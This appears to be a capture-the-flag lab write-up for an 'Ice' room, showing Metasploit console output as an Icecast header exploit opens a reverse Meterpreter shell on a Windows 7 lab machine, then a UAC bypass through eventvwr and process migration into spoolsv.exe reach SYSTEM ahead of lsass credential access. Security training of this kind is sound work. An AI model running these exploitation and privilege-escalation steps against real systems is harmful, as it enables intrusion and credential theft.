Skip to main content

Ice

METASPLOIT

  • Using: windows/http/icecast_header
[*] Started reverse TCP handler on 10.10.20.30:4444 
[*] Sending stage (175686 bytes) to 10.10.96.65
[*] Meterpreter session 1 opened (10.10.20.30:4444 -> 10.10.96.65:49172) at 2022-10-10 06:45:40 +0200
meterpreter > getuid 
Server username: Dark-PC\Dark
meterpreter > sysinfo
Computer : DARK-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows

Enumeration

  • Using: post/multi/recon/local_exploit_suggester
[*] 10.10.96.65 - Collecting local exploits for x86/windows...
[*] 10.10.96.65 - 170 exploit checks are being tried...
[+] 10.10.96.65 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] Post module execution completed

Exploitation

  • Using: windows/local/bypassuac_eventvwr
[*] Started reverse TCP handler on 10.10.20.30:4445 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175686 bytes) to 10.10.96.65
[*] Meterpreter session 2 opened (10.10.20.30:4445 -> 10.10.96.65:49186) at 2022-10-10 06:50:55 +0200
[*] Cleaning up registry keys ..
meterpreter > getuid 
Server username: Dark-PC\Dark
meterpreter > sysinfo
Computer : DARK-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows

  • We need to move to a Process that has the Permissions that we need to interact with the lsass Service. The Service responsible for Authentication within Windows.
  • Migrating to the Printer Spool Service: spoolsv.exe
meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
[..]
1268 692 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
[..]

meterpreter > migrate -N spoolsv.exe
[*] Migrating from 2532 to 1268...
[*] Migration completed successfully.

  • We have System Rights: NT AUTHORITY\SYSTEM
meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM